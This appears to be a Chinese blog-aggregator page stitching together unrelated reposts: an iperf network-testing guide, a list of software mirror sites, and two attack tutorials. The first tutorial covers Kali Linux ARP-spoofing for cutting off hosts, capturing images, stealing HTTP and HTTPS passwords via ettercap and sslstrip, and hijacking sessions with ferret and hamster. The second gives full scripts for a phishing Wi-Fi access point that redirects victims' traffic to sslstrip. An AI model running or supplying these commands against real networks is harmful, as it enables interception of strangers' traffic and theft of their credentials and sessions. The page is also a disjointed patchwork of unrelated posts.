1.08 kali linux

2019-08-25 14:09:00 weixin_30332705 阅读数 25

一、局域网断网

1、arp攻击----让目标主机断网

工具:arpspoof

命令格式:arpspoof   -i    本机网卡    -t    目标ip   网关

Ctrl+c 终止攻击

查看局域网内在使用的ip

fping -asg 192.168.1.0/24

2、arp欺骗-----在获取目标流量的时候不会出现断网现象

让目ip流量经过我的本地网卡,从我的网关出去,不会出现断网现象

echo 1 >/proc/sys/net/ipv4/ip_forward -------让目标流量从我的本地网关出去 (该命令没有回显内容)  arpspoof -i eth0 -t 192.168.1.10 192.168.1.1 -----让目标流量经过的网卡

driftnet----获取本机网卡上的图片流量,通过arp欺骗即可获取目标主机浏览的图片

echo 1 >/proc/sys/net/ipv4/ip_forward

cat /proc/sys/net/ipv4/ip_forward---回显为“1”表示echo 1 >/proc/sys/net/ipv4/ip_forward执行成功

arpspoof -i eth0 -t 192.168.1.10 192.168.1.1

driftnet    -i     eth0  -------------会弹出一个对话框,显示图片

 

3、获取HTTP账号密码

echo 1 >/proc/sys/net/ipv4/ip_forward

arpspoof -i eth0 -t 192.168.1.10 192.168.1.1

ettercap    -Tq    -i  eth0     (-Tq:启动文本模式)

4、获取HTTPS账号密码

root@kali:~# vim /etc/ettercap/etter.conf

修改为:去掉注释

 

 echo 1 >/proc/sys/net/ipv4/ip_forward

arpspoof -i eth0 -t 192.168.1.10 192.168.1.1

sslstrip------------将HTTPS的链接还原为HTTP

sslstrip -a -f -k

ettercap    -Tq    -i  eth0 

 

5、会话劫持

echo 1 >/proc/sys/net/ipv4/ip_forward

arpspoof -i eth0 -t 192.168.1.10 192.168.1.1

wireshark    ---抓包

停止抓包,并保存抓包数据 :保存到桌面,文件格式用pacp格式

root@TEST:~# cd 桌面
root@TEST:~/桌面# ferret -r cookie.pcap

root@TEST:~/桌面# cp hamster.txt /root/

root@TEST:~# hamster

根据提示设置浏览器的代理地址及端口

在浏览器中输入:

在页面会显示被劫持会话的IP

方法二:时时同步

ferret -i eth0

hamsert

然后打开浏览器输入127.0.0.1:1234

这也就可以

 

kali64位安装ferret

ferret没有64位的

可以安装32位的

1.添加对32位的支持

dpkg --add-architecture i386 

2.更新

apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

3.安装ferret

sudo aptitude install ferret-sidejack:i386

-- apt-get install aptitude

feeret        ---重新生成抓包后的文件

hamster     --用来重放流量

 

 

root@TEST:~# cp CookieCadger-1.08.jar 桌面/

root@TEST:~# cp CookieCadger-1.08.jar 桌面/
java -jar CookieCadger-1.08.jar

在Kali下安装Java环境
1. 下载1.8u121的JAVA JDK
下载地址:http://java.sun.com/javase/downloads/index.jsp
2. 解压缩文件并移动至/opt
tar -xzvf jdk-8u91-linux-x64.tar.gz
mv jdk1.8.0_91 /opt
cd /opt/jdk1.8.0_91
3. 设置环境变量
执行 gedit ~/.bashrc , 并添加下列内容
# install JAVA JDK
export JAVA_HOME=/opt/jdk1.8.0_91
export CLASSPATH=.:${JAVA_HOME}/lib
export PATH=${JAVA_HOME}/bin:$PATH
保存退出
执行 source ~/.bashrc
4. 安装并注册
执行:
update-alternatives --install /usr/bin/java java /opt/jdk1.8.0_121/bin/java 1
update-alternatives --install /usr/bin/javac javac /opt/jdk1.8.0_121/bin/javac 1
update-alternatives --set java /opt/jdk1.8.0_121/bin/java
update-alternatives --set javac /opt/jdk1.8.0_121/bin/javac
查看结果:


则说明安装成功。

参考文档:https://www.cnblogs.com/Silvers/p/5843207.html

初学阶段需要补充的知识:

1、在文件中输入中文字符或是识别中文字符

vim下 :set fileencoding 可以查看文件编码方式  
:set fileencoding=utf-8 并保存 修改编码格式后可以写入中文

 

转载于:https://www.cnblogs.com/scorpios/p/11403343.html

2017-10-30 16:43:32 u011006622 阅读数 497

Iperf介绍

    iperf是一个基于TCP/IP和UDP/IP的网络性能测试工具,用于检测网络带宽使用率和网络质量,能测试最大TCP和UDP带宽性能,可以报告带宽、网络延迟抖动、数据包丢失率和最大传输单元等统计信息等。如测试服务器和网络设备如路由器,交换机,防火墙等的网络性能。


Iperf的主要功能

1、TCP方面

  • 测试网络带宽

  • 支持多线程,在客户端与服务端支持多重连接

  • 报告MSS/MTU值大小

  • 支持TCP窗口值自定义并可通过套接字缓冲

2、UDP方面

  • 可以设置指定带宽的UDP数据流

  • 可以测试网络抖动值、丢包数

  • 支持多播测试

  • 支持多线程,在客户端与服务器端支持多重连接


Iperf的安装

1、下载源码包,官方地址:https://iperf.fr/iperf-download.php

2、安装

1
2
3
4
[root@web1 ~]# tar zxf iperf-3.1.2-source.tar.gz 
[root@web1 ~]# cd iperf-3.1.2
[root@web1 iperf-3.1.2]# ./configure 
[root@web1 iperf-3.1.2]# make && make install

3、参数(iperf3 -h

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
[root@web1 ~]# iperf3 -h
Usage: iperf [-s|-c host] [options]
       iperf [-h|--help] [-v|--version]
 
Server or Client:
  -p, --port      #         server port to listen on/connect to
  -f, --format    [kmgKMG]  format to report: Kbits, Mbits, KBytes, MBytes
  -i, --interval  #         seconds between periodic bandwidth reports
  -F, --file name           xmit/recv the specified file
  -A, --affinity n/n,m      set CPU affinity
  -B, --bind      <host>    bind to a specific interface
  -V, --verbose             more detailed output
  -J, --json                output in JSON format
  --logfile f               send output to a log file
  -d, --debug               emit debugging output
  -v, --version             show version information and quit
  -h, --help                show this message and quit
Server specific:
  -s, --server              run in server mode
  -D, --daemon              run the server as a daemon
  -I, --pidfile file        write PID file
  -1, --one-off             handle one client connection then exit
Client specific:
  -c, --client    <host>    run in client mode, connecting to <host>
  -u, --udp                 use UDP rather than TCP
  -b, --bandwidth #[KMG][/#] target bandwidth in bits/sec (0 for unlimited)
                            (default 1 Mbit/sec for UDP, unlimited for TCP)
                            (optional slash and packet count for burst mode)
  -t, --time      #         time in seconds to transmit for (default 10 secs)
  -n, --bytes     #[KMG]    number of bytes to transmit (instead of -t)
  -k, --blockcount #[KMG]   number of blocks (packets) to transmit (instead of -t or -n)
  -l, --len       #[KMG]    length of buffer to read or write
                            (default 128 KB for TCP, 8 KB for UDP)
  --cport         <port>    bind to a specific client port (TCP and UDP, default: ephemeral port)
  -P, --parallel  #         number of parallel client streams to run
  -R, --reverse             run in reverse mode (server sends, client receives)
  -w, --window    #[KMG]    set window size / socket buffer size
  -C, --congestion <algo>   set TCP congestion control algorithm (Linux and FreeBSD only)
  -M, --set-mss   #         set TCP/SCTP maximum segment size (MTU - 40 bytes)
  -N, --no-delay            set TCP/SCTP no delay, disabling Nagle's Algorithm
  -4, --version4            only use IPv4
  -6, --version6            only use IPv6
  -S, --tos N               set the IP 'type of service'
  -L, --flowlabel N         set the IPv6 flow label (only supported on Linux)
  -Z, --zerocopy            use a 'zero copy' method of sending data
  -O, --omit N              omit the first n seconds
  -T, --title str           prefix every output line with this string
  --get-server-output       get results from server
  --udp-counters-64bit      use 64-bit counters in UDP test packets
 
[KMG] indicates options that support a K/M/G suffix for kilo-, mega-, or giga-
 
iperf3 homepage at: http://software.es.net/iperf/
Report bugs to:     https://github.com/esnet/iperf


Iperf应用实例

    iperf是以C/S模式工作,运行于服务端和客户端下。服务端主要用于监听到达的测试请求,而客户端主要用于发起连接会话。因此要使用iperf,需要两台服务器,一台运行在服务器模式下,一台运行在客户端模式下。

1、测试TCP吞吐量

启动一个服务器端,使用iperf -s命令,默认监听5201端口,在客户端使用iperf -c +服务端ip,运行测试(这里使用web1作为服务端,web2作为客户端)

wKioL1bs1fCQ9uNCAAC92YZuf4M262.jpg服务端自动接收客户端的连接请求

wKioL1bs1hKgMpFjAAC421LYk0o497.jpg

    由输出结果看出,iperf默认输出10s的状态,Transfer列输出每秒的数量量在370MB左右,Bandwidth列显示网卡的速率



2、指定iperf的运行时间(-t参数)和输出速率(-i参数)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
##指定20秒内每隔5秒输出一次结果
[root@web2 ~]# iperf3 -c 192.168.1.250 -t 20 -i 5
Connecting to host 192.168.1.250, port 5201
[  4] local 192.168.1.209 port 55780 connected to 192.168.1.250 port 5201
[ ID] Interval           Transfer     Bandwidth       Retr  Cwnd
[  4]   0.00-5.00   sec  1.79 GBytes  3.07 Gbits/sec    0   1.07 MBytes       
[  4]   5.00-10.00  sec  1.85 GBytes  3.18 Gbits/sec    0   1.16 MBytes       
[  4]  10.00-15.00  sec  1.83 GBytes  3.14 Gbits/sec    0   1.20 MBytes       
[  4]  15.00-20.00  sec  1.78 GBytes  3.06 Gbits/sec    0   1.24 MBytes       
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval           Transfer     Bandwidth       Retr
[  4]   0.00-20.00  sec  7.25 GBytes  3.11 Gbits/sec    0             sender
[  4]   0.00-20.00  sec  7.24 GBytes  3.11 Gbits/sec                  receiver
 
iperf Done.


3、指定发送数据量(-n参数)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#指定发送一个5GB左右的数据包,并且每隔2秒输出状态结果
[root@web2 ~]# iperf3 -c 192.168.1.250 -i 2 -n 5000000000
Connecting to host 192.168.1.250, port 5201
[  4] local 192.168.1.209 port 56432 connected to 192.168.1.250 port 5201
[ ID] Interval           Transfer     Bandwidth       Retr  Cwnd
[  4]   0.00-2.00   sec   758 MBytes  3.18 Gbits/sec    0    952 KBytes       
[  4]   2.00-4.00   sec   769 MBytes  3.23 Gbits/sec    0    984 KBytes       
[  4]   4.00-6.00   sec   757 MBytes  3.17 Gbits/sec    0   1.01 MBytes       
[  4]   6.00-8.00   sec   684 MBytes  2.87 Gbits/sec    0   1.05 MBytes       
[  4]   8.00-10.00  sec   734 MBytes  3.08 Gbits/sec    0   1.08 MBytes       
[  4]  10.00-12.00  sec   754 MBytes  3.16 Gbits/sec    0   1.11 MBytes       
[  4]  12.00-12.88  sec   313 MBytes  2.99 Gbits/sec    0   1.12 MBytes       
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval           Transfer     Bandwidth       Retr
[  4]   0.00-12.88  sec  4.66 GBytes  3.11 Gbits/sec    0             sender
[  4]   0.00-12.88  sec  4.65 GBytes  3.10 Gbits/sec                  receiver
 
iperf Done.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
##指定一个文件传输(-F)
 
[root@web2 ~]# du -sh ntopng-2.2.tar.gz 
88M ntopng-2.2.tar.gz
 
[root@web2 ~]# iperf3 -c 192.168.1.250 -F ntopng-2.2.tar.gz -t 20-i 2
Connecting to host 192.168.1.250, port 5201
[  4] local 192.168.1.209 port 56948 connected to 192.168.1.250 port 5201
[ ID] Interval           Transfer     Bandwidth       Retr  Cwnd
[  4]   0.00-0.12   sec  36.7 MBytes  2.47 Gbits/sec    0    420 KBytes       
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval           Transfer     Bandwidth       Retr
[  4]   0.00-0.12   sec  36.7 MBytes  2.47 Gbits/sec    0             sender
        Sent 36.7 MByte / 87.1 MByte (42%) of ntopng-2.2.tar.gz
[  4]   0.00-0.12   sec  34.9 MBytes  2.36 Gbits/sec                  receiver
 
iperf Done.


4、指定多线程网络传输测试(-P),同时可以使用-f M参数将结果通过MBytes/sec来显示

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#使用单线程传输,传输10GB的数据一共消耗了27.36秒,平均速率为350 MBytes/sec
[root@web2 ~]# iperf3 -c 192.168.1.250 -n 10000000000 -i 5 -f M
Connecting to host 192.168.1.250, port 5201
[  4] local 192.168.1.209 port 57348 connected to 192.168.1.250 port 5201
[ ID] Interval           Transfer     Bandwidth       Retr  Cwnd
[  4]   0.00-5.00   sec  1.58 GBytes   324 MBytes/sec    0   1.11 MBytes       
[  4]   5.00-10.00  sec  1.62 GBytes   333 MBytes/sec    0   1.21 MBytes       
[  4]  10.00-15.00  sec  1.65 GBytes   339 MBytes/sec    0   1.27 MBytes       
[  4]  15.00-20.00  sec  1.76 GBytes   361 MBytes/sec    0   1.31 MBytes       
[  4]  20.00-25.00  sec  1.82 GBytes   373 MBytes/sec   37   1.32 MBytes       
[  4]  25.00-27.36  sec   886 MBytes   376 MBytes/sec    0   1.35 MBytes       
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval           Transfer     Bandwidth       Retr
[  4]   0.00-27.36  sec  9.31 GBytes   349 MBytes/sec   37             sender
[  4]   0.00-27.36  sec  9.31 GBytes   348 MBytes/sec                  receiver
 
iperf Done.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
[root@web2 ~]# iperf3 -c 192.168.1.250 -n 10000000000 -i 5
Connecting to host 192.168.1.250, port 5201
[  4] local 192.168.1.209 port 57585 connected to 192.168.1.250 port 5201
[ ID] Interval           Transfer     Bandwidth       Retr  Cwnd
[  4]   0.00-5.00   sec  1.87 GBytes  3.21 Gbits/sec    0    990 KBytes       
[  4]   5.00-10.00  sec  1.87 GBytes  3.22 Gbits/sec    0   1.04 MBytes       
[  4]  10.00-15.00  sec  1.81 GBytes  3.12 Gbits/sec    0   1.12 MBytes       
[  4]  15.00-20.00  sec  1.75 GBytes  3.01 Gbits/sec    0   1.20 MBytes       
[  4]  20.00-25.00  sec  1.76 GBytes  3.03 Gbits/sec   14   1.37 MBytes       
[  4]  25.00-25.81  sec   245 MBytes  2.53 Gbits/sec    0   1.38 MBytes       
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval           Transfer     Bandwidth       Retr
[  4]   0.00-25.81  sec  9.31 GBytes  3.10 Gbits/sec   14             sender
[  4]   0.00-25.81  sec  9.31 GBytes  3.10 Gbits/sec                  receiver
 
iperf Done.


5、指定多线程传输

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
[root@web2 ~]# iperf3 -c 192.168.1.250 -n 10000000000 -i 5 -P 2 -f M
Connecting to host 192.168.1.250, port 5201
[  4] local 192.168.1.209 port 57751 connected to 192.168.1.250 port 5201
[  6] local 192.168.1.209 port 57752 connected to 192.168.1.250 port 5201
[ ID] Interval           Transfer     Bandwidth       Retr  Cwnd
[  4]   0.00-5.00   sec   905 MBytes   181 MBytes/sec    0    585 KBytes       
[  6]   0.00-5.00   sec   903 MBytes   181 MBytes/sec    0    602 KBytes       
[SUM]   0.00-5.00   sec  1.77 GBytes   362 MBytes/sec    0             
- - - - - - - - - - - - - - - - - - - - - - - - -
[  4]   5.00-10.00  sec   917 MBytes   183 MBytes/sec    0    687 KBytes       
[  6]   5.00-10.00  sec   917 MBytes   183 MBytes/sec    0    704 KBytes       
[SUM]   5.00-10.00  sec  1.79 GBytes   367 MBytes/sec    0             
- - - - - - - - - - - - - - - - - - - - - - - - -
[  4]  10.00-15.00  sec   929 MBytes   186 MBytes/sec    0    723 KBytes       
[  6]  10.00-15.00  sec   929 MBytes   186 MBytes/sec    0    735 KBytes       
[SUM]  10.00-15.00  sec  1.81 GBytes   372 MBytes/sec    0             
- - - - - - - - - - - - - - - - - - - - - - - - -
[  4]  15.00-20.00  sec   921 MBytes   184 MBytes/sec    0    745 KBytes       
[  6]  15.00-20.00  sec   920 MBytes   184 MBytes/sec    0    759 KBytes       
[SUM]  15.00-20.00  sec  1.80 GBytes   368 MBytes/sec    0             
- - - - - - - - - - - - - - - - - - - - - - - - -
[  4]  20.00-25.00  sec   919 MBytes   184 MBytes/sec    0    782 KBytes       
[  6]  20.00-25.00  sec   919 MBytes   184 MBytes/sec    0    802 KBytes       
[SUM]  20.00-25.00  sec  1.79 GBytes   368 MBytes/sec    0             
- - - - - - - - - - - - - - - - - - - - - - - - -
[  4]  25.00-25.97  sec   179 MBytes   184 MBytes/sec    0    785 KBytes       
[  6]  25.00-25.97  sec   180 MBytes   185 MBytes/sec    0    803 KBytes       
[SUM]  25.00-25.97  sec   359 MBytes   369 MBytes/sec    0             
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval           Transfer     Bandwidth       Retr
[  4]   0.00-25.97  sec  4.66 GBytes   184 MBytes/sec    0             sender
[  4]   0.00-25.97  sec  4.65 GBytes   183 MBytes/sec                  receiver
[  6]   0.00-25.97  sec  4.66 GBytes   184 MBytes/sec    0             sender
[  6]   0.00-25.97  sec  4.65 GBytes   183 MBytes/sec                  receiver
[SUM]   0.00-25.97  sec  9.31 GBytes   367 MBytes/sec    0             sender
[SUM]   0.00-25.97  sec  9.30 GBytes   367 MBytes/sec                  receiver
 
iperf Done.


6、测试UDP丢包和延迟,使用-u参数指定UDP协议,-b(K|M|G)参数指定UD式使用的带宽模式

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
[root@web2 ~]# iperf3 -c 192.168.1.250 -u -b 1G -f M -i 2
Connecting to host 192.168.1.250, port 5201
[  4] local 192.168.1.209 port 45424 connected to 192.168.1.250 port 5201
[ ID] Interval           Transfer     Bandwidth       Total Datagrams
[  4]   0.00-2.00   sec  81.1 MBytes  40.5 MBytes/sec  10377  
[  4]   2.00-4.00   sec  94.5 MBytes  47.3 MBytes/sec  12102  
[  4]   4.00-6.00   sec  94.6 MBytes  47.3 MBytes/sec  12107  
[  4]   6.00-8.00   sec   103 MBytes  51.5 MBytes/sec  13192  
[  4]   8.00-10.00  sec  93.6 MBytes  46.8 MBytes/sec  11983  
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval           Transfer     Bandwidth       Jitter    Lost/Total Datagrams
[  4]   0.00-10.00  sec   467 MBytes  46.7 MBytes/sec  0.037 ms  435/59760 (0.73%)  
[  4] Sent 59760 datagrams
 
iperf Done.

由输出结果显示,Jitter表示抖动时间,或者称为传输延迟,Lost/Total表示丢失的数据包和总的数据包数量,Datagrams表示总共传输数据包的数量


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#在服务端的输出
Accepted connection from 192.168.1.209, port 58179
[  5] local 192.168.1.250 port 5201 connected to 192.168.1.209 port 45424
[ ID] Interval           Transfer     Bandwidth       Jitter    Lost/Total Datagrams
[  5]   0.00-1.00   sec  35.6 MBytes   299 Mbits/sec  0.054 ms  29/4590 (0.63%)  
[  5]   1.00-2.00   sec  43.0 MBytes   361 Mbits/sec  0.071 ms  30/5533 (0.54%)  
[  5]   2.00-3.00   sec  48.4 MBytes   406 Mbits/sec  0.154 ms  29/6225 (0.47%)  
[  5]   3.00-4.00   sec  45.6 MBytes   382 Mbits/sec  0.026 ms  6/5837 (0.1%)  
[  5]   4.00-5.00   sec  47.3 MBytes   397 Mbits/sec  0.168 ms  124/6183 (2%)  
[  5]   5.00-6.00   sec  46.1 MBytes   387 Mbits/sec  0.023 ms  40/5941 (0.67%)  
[  5]   6.00-7.00   sec  49.0 MBytes   411 Mbits/sec  0.022 ms  48/6322 (0.76%)  
[  5]   7.00-8.00   sec  53.1 MBytes   446 Mbits/sec  0.037 ms  67/6867 (0.98%)  
[  5]   8.00-9.00   sec  44.9 MBytes   376 Mbits/sec  0.163 ms  26/5769 (0.45%)  
[  5]   9.00-10.00  sec  48.4 MBytes   406 Mbits/sec  0.015 ms  36/6232 (0.58%)  
[  5]  10.00-10.04  sec  2.04 MBytes   426 Mbits/sec  0.037 ms  0/261 (0%)  
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval           Transfer     Bandwidth       Jitter    Lost/Total Datagrams
[  5]   0.00-10.04  sec  0.00 Bytes  0.00 bits/sec  0.037 ms  435/59760 (0.73%)  
-----------------------------------------------------------
Server listening on 5201
-----------------------------------------------------------
2014-08-29 17:39:19 weixin_33682719 阅读数 82

主要内容:参考网上多篇文章,自己动手完全实验成功,在这里详细记录自己在kali linux下的搭建过

程,本文着重于动手实现,不涉及原理,关于原理应该会在之后的单独文章中详细探究


实验环境:

   Host 主机: Windows 8 64位

   虚拟机软件:

      VirtualBox 4.3.8(需要安装同4.3.8版本 拓展包 和 增强功能包 ,这是两个不同的包!安装增强包的时候需要安装相应的内核头文件和编译环境,这里不多做介绍)


  虚拟机:Kali Linux1.08, i386(安装系统请自行搜索相应教程)


  USB无线网卡 Ralink RT2870芯片(Kali自带驱动,若需装网卡驱动的请自行搜索解决)

 注意, 如果是仅有笔记本自带的无线网卡,是无法在虚拟机中完成这个实验的,笔记本自带的无线网卡是不能以USB设备的方式分配给虚拟机的,必须是USB无线网卡


  启动Kali Linux虚拟机,在左上角的设备-〉分配USB设备 中将无线网卡分配给虚拟机


搭建实际钓鱼AP环境:


  思路和配置:

   Kali上有一张以太网卡eth0(在虚拟机的网络配置中选择 网络地址转换(NAT) 就可以使得Kali 虚拟机通过Windows8 物理主机上网),这个是kali连上Internet的接口,而连接到我们的钓鱼AP的客户端也会通过这个接口连到Internet上。实际我们的目的是监视客户端的数据流量。

  我们的AP使用的是DHCP自动分配ip地址的方式让客户端连接。下面是DHCP服务器的简单配置:


DHCP的安装与配置

  注意: DHCP软件包的名称和配置文件存放目录和CentOS的不同


  ①.安装 dhcp3 服务器软件: $sudo apt-get install dhcp3-server


  ②.配置 dhcp3 服务配置文件/etc/dhcp3/dhcpd.conf

  #vi /etc/dhcp3/dhcpd.conf
  authoritative;
  ddns-update-style none;
  ignore client-updates;
  default-lease-time 7200;
  max-lease-time 36000;
  option domain-name "xx.cn"; //取个域名,任意取
  option domain-name-servers 202.202.96.33, 202.202.96.34; //这两个是dns服务器,填ISP给的即可
  option routers 192.168.10.1; //默认网关
  subnet 192.168.10.0 netmask 255.255.255.0 {//网段以及掩码
  range 192.168.10.10 192.168.10.120; //分配ip地址的范围
  }


  ③.更改 dhcp3 服务监听的网卡,可以修改/etc/default/dhcp3-server INTERFACES="at0" // DHCP服务器监听的网络接口,文章后面会讲到at0

  注意: 需要为DHCP服务的监听网络接口分配ip地址且必须使得该接口的地址和DHCP提供的子网在同一网段dhcp服务才能正确开启,配置好之后我们先不启动


我们要通过eth0的网卡连上Internet,所以我们的钓鱼AP进来的数据需要通过 nat 实现上网。有关

Linux防火墙iptables以及nat的详细内容,请参考鸟哥写的资料http://linux.vbird.org/linux_server/0250simple_firewall.php


iptables.sh是我写的关于iptables和nat的简单的设置,如有需要可参考一下


iptables.sh内容

#!/bin/bash
##2014-08-19
##fake ap iptables configure script
##write by netcake


#filter

#清除filter表的所有防火墙规则
iptables -F
iptables -X
iptables -Z


#设定filter表的3条链的默认 动作

iptables -P INPUT DROP
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT


#信任本机回环端口lo

iptables -A INPUT -i lo -j ACCEPT


#信任由本机建立的链接

iptables -A INPUT -m state –state RELATED,ESTABLISHED -j ACCEPT


#开启Linux内核的封包转递功能,但是这种方法开启在重启之后失效,若想固定开启封包转递功能,

#可以编辑/etc/sysctl.conf文件,找到
#
#        net.ipv4.ip_forward=1

#

#一行,取消注释

echo "1" > /proc/sys/net/ipv4/ip_forward


#nat


#清除nat表的所有防火墙规则

iptables -t nat -F
iptables -t nat -X
iptables -t nat -Z


#设定nat表的3条链的默认 动作,需要指定表名是nat,若不指定则默认是filter

iptables -t nat -P PREROUTING ACCEPT
iptables -t nat -P OUTPUT ACCEPT
iptables -t nat -P POSTROUTING ACCEPT


#Internet access,开启nat

#这条指令是将所有来自192.168.10.0/24 网段(dhcp分配给连上钓鱼AP的ip地址)经由eth0接口出去的数

#据进行网络地址转换,即将来自192.168.10.0/24 网段的数据的ip地址替换为eth0接口的ip地址

iptables -t nat -A POSTROUTING -s 192.168.10.0/24 -o eth0 -j MASQUERADE


#listen on local,redirect http data,sslstrip的监听端口

#将所有目的端口为80的tcp数据镜像到本机端口10000
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


#iptables.sh脚步结束



ap.sh是开启钓鱼热点的脚本


ap.sh内容

#!/bin/bash


#实验过程中,发现往往第一次AP开启成功,后面则有时成功有时失败,后来观察发现失败的时候
#虚拟机里面 network-manager此时都不能识别无线网卡,因此先重启network-manager识别无线网卡
#后再开启AP,后面再无开启失败的问题
#重新启动network-manager识别无线网卡

/etc/init.d/network-manager restart
sleep 4


#将无线网卡调整至监听模式

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up


#启动无线网卡监听模式。此时会产生一个mon0的对应监听网络虚拟接口,

#实际上此时mon0等同于waln0
airmon-ng start wlan0
sleep 3


#指定ssid为wifi 和AP频道为6,开启AP,airbase-ng命令会产生相应的一个atX虚拟网络接口,

#在这里就是at0

airbase-ng -e wifi -c 6 mon0


#ap.sh结束



at0.sh脚本设置虚拟网络接口at0的网络参数和开启DHCP服务在at0上监听客户端的请求


at0.sh内容

#!/bin/bash

#启用at0虚拟网络接口

#配置ip为dhcp服务器配置文件中指定的网关ip(即DHCP配置文件中的option-routers)

#注意: DHCP服务的监听网络接口ip地址必须和DHCP提供的子网是在同一网段
#设置mtu,不设定也无妨
ifconfig at0 up
ifconfig at0 192.168.10.1 netmask 255.255.255.0
ifconfig at0 mtu 1500


#指定DHCP服务器使用的配置文件/etc/dhcp3/dhcpd.conf和pid文件/var/run/dhcpd.pid

#还有监听的网络接口at0
dhcpd -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd.pid at0


#启动DHCP服务,注意,任何时候修改了dhcp服务器的配置文件必须要重启DHCP服务才能生效

/etc/init.d/isc-dhcp-server start


#at0.sh结束



开启sslstrip 、ettercap 监听


    我们已经将所有的tcp 80端口的数据镜像到了10000端口,我们只需在此监听即可

    #sslstrip -l 10000


    打开另一终端,使用ettercap显示监听到的ssl加密数据

    #ettercap -Tqi at0


    注意: 开启ettercap会导致/proc/sys/net/ipv4/ip_forward 的值为0,即客户端会断开和

    Internet的链接,此时需手动修改/proc/sys/net/ipv4/ip_forward的值

            #echo 1 > /proc/sys/net/ipv4/ip_forward


转载于:https://blog.51cto.com/poollooq/1546635

2017-05-09 14:25:27 weixin_34150830 阅读数 13

一、站点版
(一)、企业站
1.搜狐:http://mirrors.sohu.com/
2.网易:http://mirrors.163.com/
3.阿里云:http://mirrors.aliyun.com/
4.腾讯:http://android-mirror.bugly.qq.com:8080/(仅针对APP开发的软件,限流,不推荐)

(二)、教育站
1.上海交通大学:http://ftp.sjtu.edu.cn/html/resources.xml(部分移动运营商出口状况不佳,无法访问)
2.华中科技大学:http://mirror.hust.edu.cn/(当前已用容量估计:4.83T)
3.清华大学:http://mirrors.tuna.tsinghua.edu.cn/(当前已用容量估计:9.8T)
4.北京理工大学:http://mirror.bit.edu.cn/web/
5.兰州大学:http://mirror.lzu.edu.cn/
6.中国科技大学:http://mirrors.ustc.edu.cn/(当前已用容量估计:21.32T)
7.大连东软信息学院:http://mirrors.neusoft.edu.cn/(当前已用容量估计:2.5T)
8.东北大学:http://mirror.neu.edu.cn/
9.大连理工大学:http://mirror.dlut.edu.cn/
10.哈尔滨工业大学:http://run.hit.edu.cn/html/(部分联通运营商出口状况不佳,无法访问)
11.北京交通大学:http://mirror.bjtu.edu.cn/cn/
12.天津大学:http://mirror.tju.edu.cn(无法访问,ping超时)
13.中国地质大学:http://mirrors.cug.edu.cn/(当前已用容量估计:2.3T)
14.浙江大学:http://mirrors.zju.edu.cn/
15.厦门大学:http://mirrors.xmu.edu.cn/
16.中山大学:http://mirror.sysu.edu.cn/
17.重庆大学:http://mirrors.cqu.edu.cn/(当前已用容量估计:3.93T)
18.北京化工大学:http://ubuntu.buct.edu.cn/(Android SDK镜像仅供校内使用,当前已用容量估计:1.72T)
19.南阳理工学院:http://mirror.nyist.edu.cn/
20.×××:http://www.opencas.org/mirrors/
21.电子科技大学:http://ubuntu.uestc.edu.cn/(无法访问,ping超时)
22.电子科技大学星辰工作室:http://mirrors.stuhome.net/(当前已用容量估计:1.08T)
23.西北农林科技大学:http://mirrors.nwsuaf.edu.cn/(只做CentOS镜像,当前已用容量估计:140GB)

(三)、其他
1.首都在线科技股份有限公司(英文名Capital Online Data Service):http://mirrors.yun-idc.com/
2.中国电信天翼云:http://mirrors.ctyun.cn/
3.noc.im:http://mirrors.noc.im/(当前已用容量估计:3.74T)
4.常州贝特康姆软件技术有限公司:http://centos.bitcomm.cn/(只做CentOS镜像,当前已用容量估计:140GB)
5.公云PubYun(母公司为贝特康姆):http://mirrors.pubyun.com/
6.Linux运维派:http://mirrors.skyshe.cn/(使用阿里云服务器,界面使用浙江大学的模板,首页维护,内容可访问)
7.中国互联网络信息中心:http://mirrors.cnnic.cn/(只做Apache镜像,当前已用容量估计:120GB)
8.Fayea工作室:http://apache.fayea.com/(只做Apache镜像,当前已用容量估计:120GB)

二、软件版

(一)、操作系统类
1.Ubuntu
阿里云:http://mirrors.aliyun.com/ubuntu-releases/
网易:http://mirrors.163.com/ubuntu-releases/
搜狐:http://mirrors.sohu.com/ubuntu-releases/(搜狐在12年之后似乎不同步了)
首都在线科技股份有限公司:http://mirrors.yun-idc.com/ubuntu-releases/

2.centos
网易:http://mirrors.163.com/centos/
搜狐:http://mirrors.sohu.com/centos/
阿里云:http://mirrors.aliyun.com/centos/

(二)、服务器类
1.tomcat、Apache
中国互联网络信息中心:http://mirrors.cnnic.cn/apache/
华中科技大学:http://mirrors.hust.edu.cn/apache/
北京理工大学:http://mirror.bit.edu.cn/apache/

2.MySQL
北京理工大学:http://mirror.bit.edu.cn/mysql/Downloads/
中国电信天翼云:http://mirrors.ctyun.cn/Mysql/

3.PostgreSQL
浙江大学:http://mirrors.zju.edu.cn/postgresql/

4.MariaDB
中国电信天翼云:http://mirrors.ctyun.cn/MariaDB/

5.VideoLAN
大连东软信息学院:http://mirrors.neusoft.edu.cn/videolan/
中国科技大学:http://mirrors.ustc.edu.cn/videolan-ftp/

(三)、开发工具类
